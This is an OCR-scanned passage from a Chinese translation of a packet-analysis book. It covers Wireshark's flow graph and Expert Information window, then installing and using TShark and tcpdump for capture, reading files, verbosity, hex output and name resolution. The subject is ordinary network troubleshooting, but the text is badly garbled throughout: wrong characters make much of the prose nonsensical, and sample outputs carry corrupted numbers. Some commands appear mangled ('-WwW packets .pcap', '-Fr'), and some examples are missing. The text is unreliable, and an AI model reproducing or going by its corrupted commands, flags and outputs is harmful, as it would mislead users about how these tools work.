Packer 2 DMN Sianier ET err A WH We ntar ei ENT 
show: |All pacets 于 | Flow type: (AlFlows ™ | Addresses: |Any ™ 


Reset 


Close Help 





图 5-22 ”TCP 流 图 可 以 让 我 们 更 好 地 看 到 整个 连接 
这 个 数据 流 图 是 一 个 递归 DNS 查 询 ， 表 示 一 台 主 机 收 到 DNS 查 询 结 
果 再 把 它 转 友 出 去 (我 们 将 在 第 9 间 讲 到 DNS)，。 图 中 的 每 一 个 竖 线 表 
示 早 独 的 主机 。 数 据 流 图 是 一 个 将 两 个 设备 之 间 相 互通 信 可 视 化 的 好 方 
法 ， 这 也 有 助 于 你 理解 不 熟悉 的 协议 是 如 何 正 常 交 互 的 。 


5.8 ”专家 信息 


Wireshark 中 每 个 协议 的 解 术 占 都 有 一 些 专 家 信息 ， 可 以 提醒 你 该 协 


议 的 数据 包 中 的 特定 状态 。 这 些 状 态 可 以 分 为 4 类 。 
对 话 : 关于 通信 的 基本 信息。 
注意 : 正常 通信 中 的 弄 第 数据 包 。 
党 告 ， 非 正常 通信 中 的 寞 常数 据 包 。 
首 误 : 数据 包 中 的 馈 误 ， 或 者 解析 副 解 析 时 的 蚀 误 。 


举例 来 说 ， 打 开 download-slow.pcapng 这 个 文件 ， 然 后 单 击 
Analyze， 并 选择 Expert Info Composite， 便 可 以 打开 这 个 捕获 文件 的 专 


家 信息 窗口 。 然 后 反选 Group by summary 来 依据 严重 性 排序 输出 〈 见 图 
B223 7) 8 








帮 Wireshark . Expert Information . download-slow 一 口 xX 
Severity Summary Group Protocol Count 
Y Warning Sequence TCP 3 


1620 Previous segment not captured (common at capture start) 
3275 previous segment not captured (common at capture start) 
3295 Thisframe isa (suspected) out-of-order segment 


1623 Duplicate ACK (#1) 

1625 Duplicate ACK (#2) 

1627 Duplicate ACK (#3) 

1629 Duplicate ACK (#4) 

1631 Duplicate ACK (#5) 

1633 Duplicate ACK (#6) 

1635 Duplicate ACK (#7) 

1637 Duplicate ACK (#8) 

1638 Thisframe isa (suspected) fast retransmission 
1638 Thisframe is a (suspected) retransmission 
3278 Duplicate ACK (#1) 

3280 Duplicate ACK (#2) 

3282 Duplicate ACK (#3) 

3284 Duplicate ACK (#4) 

3286 Duplicate ACK (#5) 

3288 Duplicate ACK (#6) 

3290 Duplicate ACK (#7) 

3292 Duplicate ACK (#8) 

3294 Duplicate ACK (#9) 


1 Connection establish request (SYN): server port 80 
2 Connection establish acknowledge (SYN+ACK): server por 


4 GET /pub/dists/opensuse/distribution/11.2/iso/openSUSE-.. 











No displsy Mer set. 





Limit to Display Filter [LL] Group by summar y Search: | Show... 








图 5-23 ”专家 信息 窗口 给 出 了 协议 解析 器 中 内 置 专家 系统 的 信息 


我 们 应 该 注意 到 ， 这 个 窗口 中 对 于 每 种 类 型 的 信息 都 有 一 个 选项 
卡 ， 在 这 个 例子 中 没有 错误 消 奶 ， 但 有 3 个 警告 、18 个 注意 以 及 3 个 对 
1 


这 个 捕获 文件 中 的 大 多 数 信 息 都 与 TICP 有 关 ， 这 仅仅 是 因为 专家 信 
恩 系 统 传统 上 常用 于 该 协议 。 目 前 ， 总 共 为 TCP 配 置 了 29 种 专家 信息 ， 
并 且 这 些 信 息 在 解决 捕获 文件 的 问题 时 非常 有 用 。 这 些 信息 可 以 在 满足 
如 下 条 件 的 时 候 对 数据 包 进 行 标记 (这 些 消息 的 意义 在 我 们 学 习 了 第 8 
间 和 第 11 半 后 会 更 加 明了 )。， 


1. 对 话 消 忌 


WE 由 接收 者 发 送 ， 用 来 通知 发 送 者 TCP 接 收 窗口 的 大 小 已 
被 改变 。 


2. 注意 消 忆 
TCP 重 传输 ”数据 包 于 失 的 结果 。 当 收 到 重复 的 ACK， 或 者 数据 包 
的 重 传输 计 时 需 超 时 的 时 候 产 生 。 


重复 ACK ” 当 一 台 主 机 没有 收 到 下 一 个 期 望 序列 号 的 数据 包 时 ， 它 
会 生成 其 最 后 收 到 的 一 个 数据 的 重复 ACK。 


震 贸 口 探 合 ”在 一 个 零 窗 口 包 被 友 达 之 后 ， 用 来 监视 TCP 接 收 窗口 
的 状态 〈 将 在 第 9 半 中 介绍 )。 


保持 活动 状态 ACK ”用 来 响应 保持 活动 状态 数据 包 。 
零 窗口 探查 ACK 用 来 响应 零 窗口 探查 数据 包 


和 贸 口 已 满 ”用 来 通知 传输 主机 接收 者 的 TCP 接 收 窗口 已 满 。 


只 


于 3 信 局 
上 一 段 丢失 ”指明 数据 包 丢 失 。 当 数据 流 中 一 个 期 望 的 序列 亏 航 跳 
过 时 产生 ， 


收 到 丢失 数据 包 的 ACK 当 一 个 数据 包 已 经 确认 丢失 但 仍 收 到 了 其 
ACK 数 据 包 时 产生 。 


你 持 连 接 状 态 ” 当 一 个 连接 的 保持 连接 数据 包 出 现时 触及 。 


零 窗 口 ” 当 接收 方 已 经 达到 TCP 接 收 窗口 大 小 时 ， 会 及 出 一 个 零 窗 
口 通知 ， 要 求 肥 大 方 俘 止 传输 数据 。 


乱 序 “” 当 数据 包 乱 序 被 接收 时 ， 会 利用 序列 号 进行 检测 。 

快速 重 传输 ”一 次 重 传 会 在 收 到 一 个 重复 ACK 的 20ms 内 进行 。 
4. 错误 消息 

没有 错误 消 县 

虽然 本 章 中 介绍 的 一 些 功 能 看 上 去 只 有 在 偶尔 的 情况 下 才 会 用 到 ， 


但 你 可 能 会 肥 现 它们 比 你 想象 中 要 有 用 得 多 。 你 需要 熟 壬 这 些 贸 口 和 选 
项 ， 这 很 重要 ， 因 为 我 会 在 之 后 的 几 个 革 市 中 频 粽 地 提 人 到 它们 。 





[1] ESPN 一 娱乐 与 体育 节目 电视 网 ， 是 一 个 24 小 时 专门 播放 体育 市 目 
的 美国 有 线 电 视 联 播 网 。 一 一 详 者 注 





虽然 使 用 GUI 风能 解雇 大 部 分 问题 ， 但 是 在 有 些 时 候 需 要 使 用 命令 
行 工 具 一 一 TShark 或 Tcpdump。 以 下 列举 了 可 能 需要 使 用 命令 行 工 其 而 
不 是 Wireshark 的 一 些 情况 。 


Wireshark 一 次 性 提供 了 太 多 的 信息 。 使 用 命令 行 工 具 可 以 限制 打印 
出 的 信息 ， 最 后 只 显示 相关 数据 ， 比 如 用 单独 一 行 来 显示 卫 地 址 。 
命令 行 工 具 适 用 于 过 滤 数 据 包 捕获 文件 ， 并 提供 结果 给 另 一 个 文 持 
UNIX 管 道 的 工具 。 

当 人 处 理 大 量 的 捕获 文件 时 ，Wireshark 可 能 会 挂 掉 ， 因 为 整个 文件 都 
要 载 入 内 存 当 中 。 先 使 用 流 来 处 理 大 型 捕获 文件 ， 可 以 让 你 快速 地 
过 小 出 相关 数据 包 ， 来 给 文件 瘦 午 。 

如 果 你 在 没有 图 形 化 界面 的 服务 器 上 操作 ， 则 这 时 候 你 可 能 不 得 不 
依靠 命令 行 工具 了 。 


本 章 我 会 展示 数据 包 分 析 领 域 音 用 的 两 个 命令 行 工 具 一 一 TShark 和 
Tcpdump。 在 我 看 来 最 好 两 个 工具 你 都 能 和 掌握， 但 我 及 现 目 己 在 
Windows 系 统 上 通 间 使 用 TShark， 而 在 UNIX 系 统 中 则 使 用 Tcpdump。 如 
末 你 只 用 Windows 系 统 ， 那 么 你 也 许可 以 跳 过 Tcpdump 的 部 分 。 
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6.1 安装 TShark 


TShark 是 基于 终端 的 Wireshark， 它 是 能 够 提供 大 量 和 Wireshark 功 
能 相同 的 数据 包 分 析 应 用 ， 但 仪 限 于 没有 GUI 的 命令 行 界面 。 如 果 你 安 
冯 了 Wireshark， 那 么 你 应 该 也 安 疼 了 TShark， 除 非 你 在 Wireshark 安 猴 


过 程 中 明确 反选 了 安 靖 TShark。 你 可 以 按照 以 下 步骤 确认 TShark 是 否 安 
小 。 

(1) 在 Windows 系 统 中 打开 一 个 命令 提示 窗口 。 早 击 开 始 玉 蛙 ， 
和 输入 cmd， 然 后 单 击 命令 行 所 示人 符 。 


(2) 打开 Wireshark 的 安 帮 目录。 如果 选择 默认 安 儿 ， 那 么 你 可 以 
在 命令 提示 符 里 输入 cd C:\Program Files\Wireshark。 


(3) 输入 tshark -v 来 运行 TShark 并 且 打 印 出 版 本 信息 。 如 果 没 安 并 
TShark， 那 么 你 会 收 到 一 个 错误 消 肯 ， 提 示 你 这 个 工具 没有 安装 ; 如 末 
TShark 闻 好 了 ， 你 会 收 到 类 似 下 面 的 版 本 信息 : 


C:\Program Files\Wireshark>tshark -V 


TShark (Wireshark) 2.0.6 (v2.0.0-6-g9a73b82 from master-2.6 
--SN1ip-- 





如 果 疫 安装 TShark 但 你 现在 义 想 使 用 它 ， 那 么 你 可 以 直接 回 到 
Wireshark 的 安装 癌 导 章 新 安装 ， 并 确保 默认 的 TShark 安 装 选 项 仆人 名 选 。 


如 果 想 立马 开始 学 习 TShark 的 功能 ， 那 么 你 可 以 在 命令 后 面 加 上 -h 
参数 。 我 们 在 本 章 之 后 的 小 节 还 会 介绍 这 样 的 命令 。 


C:\Program Files\Wireshark>tshark -h 


TShark 束 像 Wwireshark 那 样 可 以 在 多 种 操作 系统 上 运行 。 但 是 因为 它 
不 依赖 于 操作 系统 的 图 形 库 ， 所 以 不 同 操 作 系 统 的 用 尸体 验 会 更 趋 于 一 
致 。 正 因为 如 此 ，TShark 在 Windows、Linux 和 OS X 上 的 操作 基本 相 
同 。 然 而 Tshark 和 在 不 同 平 台 上 的 操作 有 时 候 也 有 不 同 。 在 本 书 中 ， 我 们 
把 重点 放 在 Windows 平 台 上 的 TShark， 因 为 TShark 主 要 被 设计 在 
Windows 上 工作 。 


6.2 ” 安 北 Tcpdump 


如 朵 说 Wireshark 是 世界 上 最 尘 行 的 图 形 化 数据 包 分 析 应 用 ， 那 么 
Tcpdump 束 十 世界 上 最 流行 的 命令 行 数据 包 分 析 应 用 。 因 为 Tcpdump 亿 
设计 在 基于 UNIX 的 系统 上 运行 ， 所 以 它 非常 易于 通过 包 管 理 右 来 安 


小， 甚至 可 以 预 装 在 很 多 Linux 发 行 版 本 中 。 


虽然 这 本 书 所 讲 的 大 部 分 内 容 午 针对 于 Windows， 但 是 基于 
Tcpdump 的 章 丰 还 是 针对 UNIX 用 户 的 。 有 具体 地 说 ， 我 们 会 用 Ubuntu 
14.04 LTS 来 演示 。 如 果 你 想 在 Windows 上 使 用 Tcpdump， 那 么 你 可 以 下 
载 安装 WinDump。 虽 然 Tcpdump 和 WinDump 的 使 用 体验 不 完全 一 样 ， 
但 是 它们 的 功能 基本 一 样 。 在 winDump 中 一 些 Tcpdump 的 功能 可 能 会 缺 
失 甚 爹 可 能 会 有 安全 漏洞 (我 们 不 会 在 本 书 讲 WinDump) 。 


Ubuntu 没 有 预 疲 Tcpdump， 但 我 们 可 以 通过 APT 包 省 理 系统 米 人 简单 
安装 。 要 安装 Tcpdump， 请 按照 以 下 步骤 操作 。 


(1) 打开 一 个 终端 窗口 并 且 运 行 sudo apt-get update， 来 确保 你 的 
软件 仓库 与 最 狐 的 软件 版 本 保持 同步 。 


(2) 执行 命令 sudo apt-get install tcpdump。 


(3) 你 会 个 提示 党 要 安 沽 一 些 依赖 才 能 够 运行 Tcpdump。 按 Y 来 允 
许 这 些 依赖 的 安 乡 ， 并 且 当 提示 时 按 回 和 车 键 。 


(4) 一 旦 安 北 完成 ， 束 可 以 运行 命令 Tcpdump -h 来 执行 
Tcpdump， 并 打印 出 当前 版 本 信息 。 如 采访 命令 执行 成 功 ， 则 说 明 你 现 
在 可 以 开始 使 用 Tcpdump 了 。 


sanders@ppa:~$ tcpdump -h 
tcpdump version 4.5.1 
libpcap version 1.5.3 
Usage: tcpdump [-aAbdDefhHIJK1lLNnNOpqRStuUvxX#| | -B size | [ -c count | 
| -C file size | [ -E algo:secret | [ -F file | [ -G seconds | 
-i interface | | -j] tstamptype | [ -M secret | 


[ 
[ -Q metadata-filter-expression | 
[| -r file | [ -s snaplen | [ -T type | [ --version | [ -V file 


| -w file | [ -W filecount | [ -y datalinktype | [ -z command 


| -Z user | [ expression | 





你 可 以 通过 调用 man tcpdump， 来 查看 Tcpdump 有 所 有 可 用 的 命令 ， 
就 像 这 样 : 


我 们 将 介绍 其 中 一 些 命令 的 用 法 。 
6.3 ”捕获 和 保存 流量 
首先 要 学 习 的 是 如 何 把 当前 流量 捕获 下 来 并 把 它们 打印 到 屏幕 上 。 


要 在 TShark 里 捕获 ， 仅 需 执行 命令 tshark。 这 条 命令 会 从 网 卡 开始 抓 取 
当前 流量 ， 并 会 在 你 的 终端 窗口 上 实时 显示 抓 取 的 结果 ， 如 下 上 所 示 : 


C:\Program Files\Wireshark>tshark 

1 0.666666 172.16.16.128 -> 74.125.95.164 TCP 66 1666 86 [|SYN] 
Seq=6 Win=8192 Len=6 MSS=1466 WS=4 SACK PERM=1 

2 606.6360167 74.125.95.164 -> 172.16.16.128 TCP 66 80 1666 [SYN, AC 
kj 


Seq=0 Ack=1 Nin=5726 Len=6 MSS=1466 SACK PERM=1 WS=64 

3 6.036182 172.16.16.128 -> 74.125.95.164 TCP 54 1666 86 [ACK | 
Seq=1 Ack=1 Win=16872 Len=0 

4 060.603060248 172.16.16.128 -> 74.125.95.164 HTTP 681 GET / HTTP/1.1 

5 6.679626 74.125.95.164 -> 172.16.16.128 TCP 66 80 1666 [ACK | 
Seq=1 Ack=628 Win=6976 Len=0 





要 在 Tcpdump 里 抓 取 流 量 ， 可 执行 tcpdump 命 令 。 一 旦 执行 这 条 命 
令 ， 你 的 终 问 窗口 束 会 出 现 如 下 所 示 的 内 容 : 


sandersQ@ppa:~$ tcpdump 

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode 
listening on eth@, link-type EN1L6MB (Ethernet), capture size 65535 bytes 
21:18:39.618672 IP 172.16.16.128.slm-api > 74.125.95.164.http: Flags [S|], 
seq 26082691767, win 8192, options [mss 14606,nop,wscale 2,nop,nop,sackoOkKk | ， 
length 6 

21:18:39.648179 IP 74.125.95.164.http > 172.16.16.128.slm-api: 

Flags [S.|], seq 2775577373, ack 2682691768, win 5726, options [mss 

1466 ,nop ,nop,sackok ,nop,wscale 6|], length 6 

21:18:39.648254 IP 172.16.16.128.slm-api > 74.125.95.164.http: Flags | . |， 
ack 1, win 4218, length 6 


21:18:39.648326 IP 172.16.16.128.slm-api > 74.125.95.164.http: Flags [P. |]， 
seq 1:628, ack 1, win 4218, length 627: HTTP: GET / HTTP/1.1 
21:18:39.697698 IP 74.125.95.164.http > 172.16.16.128.slm-api: Flags |. |， 
ack 628, win 169, length 6 








根据 你 的 系统 配置 ，TShark 和 Tcpdump 可 能 不 会 默认 从 你 设想 的 网 
卡 抓 取 流 量 。 如 果 这 种 情况 发 生 了 ， 你 束 需 要 手动 去 明确 它 。 你 可 以 使 
用 TShark 的 -D 参 数 来 列 出 当前 所 有 可 用 的 网 卡 ， 系 统 会 以 数字 列表 的 形 
式 打 印 出 网 卡 信息 ， 如 下 所 示 : 


C:\Program Files\Wireshark>tshark -D 


1. \Device\NPF {1DE695C2-346D-47E6-B855-11917B746603A} (Local Area Connect1L 
Oh 六 


2 ) 
2. \Device\NPF {1A494418-97D3-42E8-8C6B-78D79A1F7545} (Ethernet 2) 





要 使 用 其 中 一 个 网 卡 ， 可 以 在 命令 后 面 瀛 加 -i 参数 和 上 网 卡 的 标 
写 ， 如 下 所 示 : 


C:\Program Files\Wireshark>tshark -i 1 


这 个 命令 会 让 TShark 只 抓 取 针对 Local Area Connection 2 网 卡 的 流 
量 ， 该 网 卡 在 列表 里 被 标注 为 1 号 。 我 建议 始终 明确 要 从 哪个 网 卡 抓 取 
流量 ， 因 为 虚拟 软件 和 VPN 软 件 会 在 系统 中 添加 目 己 的 网 卡 ， 而 且 你 也 
需要 知道 你 捕获 的 网 络 流 量 来 日 哪里 。 


在 Linux 或 者 OS X 系 统 运行 Tcpdump 的 话 ， 请 使 用 ifconfig 命 令 来 列 
出 可 用 的 网 卡 。 


sandersQOppa:~$ ifconfig 

etho Link encap:Ethernet HWaddr 66:6c:29:1f:a7:55 
inet addr:172.16.16.139 Bcast:172.16.16.255 Mask:255.255.255.0 
inet6 addr: fe86::20c:29ff:fe1lf:a755/64 Scope:Link 


UP BROADCAST RUNNING MULTICAST MTU:1566 Metric:1 

RX packets:5119 errors:6 dropped:6 overruns:0 frame:0 
TX packets:3088 errors:6 dropped:6 overruns:6 carrier:0 
collisions:6@ txqueuelen:106060 

RX bytes:876746 (876.7 KB) TX bytes:538683 (538.6 KB) 





指明 网 卡 也 是 用 -i 参数 实现 : 


sandersQOppa:~$ tcpdump -i eth6 

这 个 命令 会 让 Tcpdump 只 从 eth0 网 卡 中 捕获 流量 。 

一 旦 设置 完成 ， 你 束 可 以 开始 捕获 流量 了 。 如 下 你 监听 的 网 卡 非 第 
家 性 ， 那 么 在 你 屏 科 上 所 打出 的 信息 可 能 会 深 动 得 飞快 ， 以 至 于 你 来 不 
及 去 珀 看 它们 。 这 时 候 我 们 可 以 把 抓 取 的 包 存 成 文件 ， 然 后 只 从 文件 中 
访 取 我 们 想 要 的 数据 包 。 

要 把 抓 到 的 包 存 为 文件 ， 可 使 用 -w 参 数 加 上 要 保存 的 文件 名 。 抓 包 
进程 会 持续 进行 ， 除 非 你 按 下 Ctrl-C 组 合 键 。 流 量 文件 会 直接 保存 到 当 
前 执行 命令 的 目录 下 ， 除 非 另 指明 路 径 。 


下 面 就 是 使 用 TShark 命 令 的 一 个 例子 : 


C:\Program Files\Wireshark>tshark -i 1 -WwW packets .pcap 


这 个 命令 会 把 从 1 写 网 卡 捕获 的 流量 全 部 写 到 以 packets.pcap 命 名 的 
文件 中 。 


使 用 Tcpdump 时 ， 交 似 的 命令 如 下 : 
sanders@ppa:~$ tcpdump -i eth@ -w packets.pcap 
要 息 从 保存 的 文件 中 回 读数 据 包 ， 可 使 用 -参数 加 上 文件 名 : 
这 个 命令 会 谈 取 packets.pcap 中 的 所 有 数据 并 把 它们 打印 到 屏幕 上 。 
使 用 Tcpdump 关 不 多 是 一 样 的 命令 。 


你 也 许 会 注意 到 ， 如 果 你 要 读 取 的 文件 包含 了 太 多 的 数据 包 ， 那 么 
你 会 过 到 之 前 讲 过 的 情况 ， 一 大 堆 的 信息 在 屏 第 飞快 深 动 以 全 于 什么 部 
看 不 清 。 这 时 你 可 以 使 用 -c 参 数 来 限制 在 屏 才 上 显示 的 数据 包 效 量 。 


本 比如 ， 使 用 TShark 下 面 的 命令 只 会 最 示 在 捕获 文件 中 最 开始 的 10 个 
包 。 


在 Tcpdump 里 用 的 是 一 样 的 参数 : 


sandersQ@ppa:~$ tcpdump -r packets.pcap -c10 


抓 包 的 时 候 也 可 以 使 用 -c 参 数 ， 这 表明 只 会 抓 取 前 10 个 包 。 当 和 -w 
参数 一 起 使 用 时 ， 可 以 把 结 琳 存 成 文件 。 


下 面 是 在 TShark 中 此 命令 的 示例 : 


C:\Program Files\Wireshark>tshark -i 1 -w packets.pcap -c16 


还 有 Tcpdump 下 的 类 似 命 令 : 


人 A, 
6.4 ”控制 输出 


使 用 命令 行 工 具 的 男 一 个 优点 是 可 以 目 定义 输出 。 一 般 GUI 尿 用 会 
把 所 有 的 信息 都 香 诉 你 ， 然 后 你 可 以 目 行 寻 找 所 需 的 内 容 。 命 令 行 工 具 
通 第 只 会 显示 最 简 输 出 ， 并 强制 你 使 用 额外 的 命令 参数 来 挖 据 更 局 级 的 
用 法 ，TShark 和 Tcpdump 也 不 例外 。 默 认 情 况 下 它们 只 会 为 一 个 数据 包 
显示 一 行 输出 。 如 果 你 想 看 到 协议 细节 或 者 单独 字 贡 这 些 更 深 的 内 容 ， 
束 需 要 使 用 和 额外 有 的 命令 参数 了 。 


在 TShark 的 输出 里 ， 每 一 行 代表 一 个 数据 包 ， 每 一 行 输出 的 格式 取 
决 于 数据 包 使 用 的 协议 类 型 。TShark 底 层 使 用 和 Wireshark 一 样 的 解析 器 
来 分 析 数 据 包 ， 所 以 TShark 的 输出 和 Wireshark 的 包 列 表 窗 口 很 像 。 正 因 
| 以 解析 七 层 协议 ， 所 以 它 能 够 比 Tcpdump 提 供 更 多 的 有 关 包 
大 4 天 志 上 全 


Tcpdump 中 每 行 也 代表 一 个 数据 包 ， 根 据 不 同 的 协议 来 规范 每 行 的 


输出 格式 。 因 为 Tcpdump 不 依赖 于 Wireshark 的 协议 解析 右 ， 所 以 第 7 层 
由 协议 信息 .无 法 被 解码 。 这 也 是 Tcpdump 的 最 大 限制 之 一 。 取而代之 的 
征 ，Tcpdump 单 行 数据 包 只 会 根据 传输 层 协 议 〈TCP 或 UDP) 进行 解码 
(我 们 会 在 第 8 章 里 看 重 讲解 ) 。 


TCP 包 使 用 以 下 格式 : 


[Timestamp | [Layer 3 Protocol| [Source IP|.|[Source Port| > [Destination IP 
] . 


[Destination Port|: [TCP Flags|, [TCP Sequence Number|, [TCP Acknowledgeme 
nt 
Number |]|,， [TCP Windows Size|, [Data Length | 





UDP 包 使 用 以 下 格式 : 


[Timestamp | [Layer 3 Protocol| [Source IP|].[Source Port| > [Destination IP 


] . 
[Destination Port|: [Layer 4 Protocol|, [Data Length | 


这 种 简单 的 单行 总 结对 快速 分 析 很 有 帮助 ， 但 最 终 你 还 是 要 对 一 个 
数据 包 进 行 深 入 分 析 。 在 Wireshark 中 ， 你 会 在 包 列 表 窗 里 近 择 一 个 
据 包 ， 它 将 在 下 方 的 包 细 节 和 包 字 节 窗 口 显 示 一 些 细 币 内容 。 使 用 命令 
行 的 命令 也 可 以 达到 类 似 效 果 。 


一 个 获取 更 多 细节 的 简单 方法 是 增加 输出 的 元 余 程 度 。 
在 TShark 中 ， 使 用 大 与 的 V 来 增加 元 余 : 


C:\Program Files\Wireshark>tshark -r packets .pcap -V 


这 会 提供 闫 似 Wireshark 打 开 packets.pcap 后 包 细 下 窗口 里 的 内 容 。 
这 里 展示 了 一 具 上 共有 正常 风 余 (基本 忌 结 ) 和 扩展 见 余 使 用 -V 参 数 获 
取 ) 的 包 的 示例 。 


自 完 正常 输出 : 


C:\Program Files\Wireshark>tshark -r packets.pcap -cl1 


1 0.00060060060 172.16.16.172 -> 4.2.2.1 ICMP Echo (ping) request 
1d=0Xx6001，seq=17/4352，tt]=128 





现在 使 用 更 大 的 见 余 选项 来 显示 更 多 的 内 容 : 


C:\Program Files\Wireshark>tshark -r packets.pcap -V -cl 
Frame 1: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on 
interface 0 

Interface id: 6 (\Device\NPF {C386671C1-579D-4F33-9CC@-73EFFFE85A54}) 


Encapsulation type: Ethernet (1) 
Arrival Time: Dec 21, 20615 12:52:43.116551660 Eastern Standard Time 
[Time shift for this packet: 6.60000606666 Seconds | 
--SN1ip-- 





在 Tcpdump， 小 写 的 v 是 用 来 增加 元 余 的 。 这 点 跟 TShark 略 有 不 
同 ，Tcpdump 人 允许 每 个 数据 包 显 示 不 同 层级 的 见 余 信息 。 你 可 以 通过 增 
加 Vv 参数 的 数量 来 增加 显示 层级 ， 公 多 到 第 3 层 ， 如 下 所 示 : 


sanders@ppa:~$ tcpdump -Fr packets.pcap -vvV 


下 面 是 在 相同 数据 包 下 ，Tcpdump 使 用 默认 元 余 选 项 和 更 高 一 级 的 
几 余 选项 之 间 的 比较 。 即 便 使 用 最 大 元 余 选 项 ， 输 出 的 信息 也 很 难 达 到 
TShark 那 样 的 丰富 上 度 。 


sanders@ppa:~$ tcpdump -r packets.pcap -c1L 
reading from file packets.pcap, link-type EN16MB (Ethernet) 
13:26:25.265937 IP 172.16.16.139 > a.resolvers.level3.net: ICMP echo reque 
st, 
id 1759, seq 1506, length 64 
sanders@ppa:~$ tcpdump -r packets.pcap -ci1 -Vv 
reading from file packets.pcap, link-type EN16MB (Ethernet) 
13:26:25.265937 IP (tos 86x8, ttl1 64, id 37322, offset 868, flags [DF|], proto 
ICMP (1), length 84) 

172.16.16.139 > a.resolvers.level3.net: ICMP echo request, id 1759, se 





q 
1506, length 64 


可 以 显示 出 多 少 细 节 取 诀 于 你 当前 分 析 数 据 包 的 协议 类 型 。 虽 然 高 
见 余 级 别 是 有 用 的 ， 但 是 有 时 也 很 难 让 我 们 看 清 所 有 的 内 容 。TShark 和 
Tcpdump 储 存 了 每 个 包 的 所 有 内 容 ， 你 可 以 以 十 六 进 制 学 节 或 它 的 
ASCII 表 示 形 式 来 查看 。 


在 TShark 里 ， 你 可 以 使 用 -x 参数 来 查看 数据 包 的 ASCII 形 式 或 十 六 
进 制 字 节 形式 ， 同 时 结合 -r 人 参数 把 捕获 文件 读 取 到 TShark 里 并 显示 出 


来 。 


C:\Program Files\Wireshark>tshark -xr packets .pcap 


显示 结果 很 像 Wireshark 有 的 包 字 节 窗 口 ， 如 图 6-1 所 示 。 


国 Administrator: Command Prompt 


导 Bli2@ 和 B 3 

属 B2 后 3 5 二 右 MD, bcdef 

各 时 3 和 行 了 石 G 抹 旺 右 d 右 b Cc 在 6f 7 了 7 了 1 7 了 2 了 3 3 了 5 36 Ehijklanopgqrstuyv 
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图 6-1 在 TShark 里 以 十 六 进 制 字 节 形式 或 ASCII 形 式 表 示 原 始 数据 包 


关 似 地 在 Tcpdump 里 ， 你 可 以 使 用 -又 参数 ， 来 得 看 数据 包 的 ASCII 
形式 或 十 六 进 制 字 节 形式 ， 同 时 结合 -r 参 数 把 捕获 文件 该 取 到 Tcpdump 
里 并 显示 出 来 ， 束 像 这 样 : 


sanders@ppa:~$ tcpdump -Xr packets.pcap 


这 条 命令 的 输出 结果 如 图 6-2 所 示 。 


© G 1. sanders@ppa: ~ (ssh) 
sanders@ppa:~ 节 tcpdump -Xr packets.pcap -c1 
reading from file packets.pcap, link-type EN19MB (Ethernet) 
13:26:25.265937 IP 172.16.16.139 > a.resolvers.level3.net: ICMP echo request, id 1759, seq 150, length 64 
Gx8000: 4566 68854 91ca 4666 4661 e648 acl16 163b E..T. .和 .和 @. . 自 .... 
x0010: 64062 6261 6866 abge 086df 6696 5144 7856 
08x8020: 6966 90966686 b99e 6466 8680 6666 1611 1213 
69x6636: 1415 1617 1819 1alb 1cld 1ei1f 2621 2223 


| 
6x6649: 2425 2627 2829 2a2b 2C2d 2e2f 3631 3233 $%&'()*+,-./0123 
8x8050: 3435 3637 4567 





图 6-2 ”在 Tcpdump 里 以 十 六 进 制 学 节 形 式 或 ASCII 形 式 表示 原始 数据 包 


如 果 你 需要 的 话 ，Tcpdump 还 允许 你 获得 更 多 的 粒度 。 你 可 以 使 用 - 
x【〔《 小 写 ) 参数 只 查看 十 六 进 制 输出 或 者 使 用 -A 参数 只 输出 ASCII 形 式 。 


如 果 你 添加 了 这 些 增加 宛 余 的 选项 ， 则 当 数 据 输出 在 屏幕 上 飞快 深 
动 时 你 会 容易 感到 眼花 练 乱 。 我 以 为 ， 要 做 到 最 有 效率 的 分 析 就 要 在 命 
令 行 使 用 最 少 的 信息 显示 你 最 关心 的 内 容 。 我 建议 从 默认 的 输出 格式 开 
台 ， 当 你 有 特别 的 包 需 要 深入 分 析 时 ， 再 使 用 更 详细 的 输出 选项 。 这 种 
策略 会 避免 你 被 大 量 数据 所 淹没 。 


6.5 名称 解析 


类 似 Wireshark，TShark 和 Tcpdump 也 会 笠 试 名 称 解 析 ， 即 把 地 址 和 
半 口 号 转换 为 名 称 。 如 条 你 注意 之 前 的 例子 ， 也 许 已 经 及 现 这 一 过 程 已 
驮 默 地 用 生 了 。 吏 像 之 前 提 到 的 ， 我 通 第 会 把 它 基 抒 来 避免 产生 更 多 网 
络 尘 量 的 可 能 。 


你 可 以 通过 -n 参 数 来 蔡 用 TShark 的 名 称 解 析 。 这 个 参数 可 以 和 其 他 
参数 一 起 使 用 来 增强 可 读 性 。 


你 可 以 通过 -N 参 数 来 局 用 或 茶 用 一 些 名 称 解 析 的 特定 功能 。 如 果 使 
用 -N 参 数 ， 则 所 有 的 名 称 解析 功能 将 会 被 茶 用 ， 除 非 你 明确 指定 一 些 功 
。 举 例 来 说 ， 下 面 的 命令 仪 会 局 用 传输 层 〈 并 口 服务 名 称 〉 的 
析 。 


C:\Program Files\Wireshark>tshark -i 1 -Nt 


你 可 以 结合 多 个 值 ， 下 和 面 这 个 命令 会 局 用 传输 层 和 MAC 层 的 解 


O 


当 使 用 该 选项 时 可 能 参考 以 下 值 。 
m: MAC 地 址 解析 。 

n: 网 络 地 址 解析 。 

t: 传输 层 〈 端 口服 务 名 称 ) 解析。 
N: 使 用 外 网 解析 服务 。 

C: 使 用 当前 DNS 解析 。 


在 Tcpdump 下 ， 使 用 -n 会 茶 用 IP 名 称 解 林 ， 使 用 -nn 也 会 苯 用 端口 服 
务 解析 。 


这 个 参数 也 可 以 和 其 他 命令 相 结 合 使 用 ， 丈 像 这 样 : 


sanders@ppa:~$ tcpdump -nni eth1 


下 面 的 例子 展示 了 一 个 捕获 的 数据 包 先 局 用 亲 口 解析 ， 然 后 再 禁 
(-n) 。 


sandersQ@ppa:~$ tcpdump -Fr tcp ports.pcap -c1 
reading from file tcp ports.pcap, link-type EN1L16MB (Ethernet) 
14:38:34.341715 IP 172.16.16.128.2826 > 212.58.226.142.@http: Flags [S|], s 


eq 
3691127924, win 8192, options [mss 1466,nop,wscale 2,nop,nop,sackOK|], leng 


th 6 

sanders@ppa:~$ tcpdump -nr tcp ports.pcap -cl1 

reading from file tcp ports.pcap, link-type EN1L16MB (Ethernet) 
14:38:34.341715 IP 172.16.16.128.2826 > 212.58.226.142.@880: Flags [S|,， seq 
3691127924, win 8192, options [mss 1466,nop,wscale 2,nop,nop,sackOK|, leng 
th 6 





这 些 命 令 仅 从 捕获 文件 tcp_ports.pcap 中 读 取 了 第 一 上 所 。 1 
命令 里 ，80 端 口 被 解析 为 http。 但 在 第 二 个 命令 ， 关 口 仅 以 数字 形式 表 
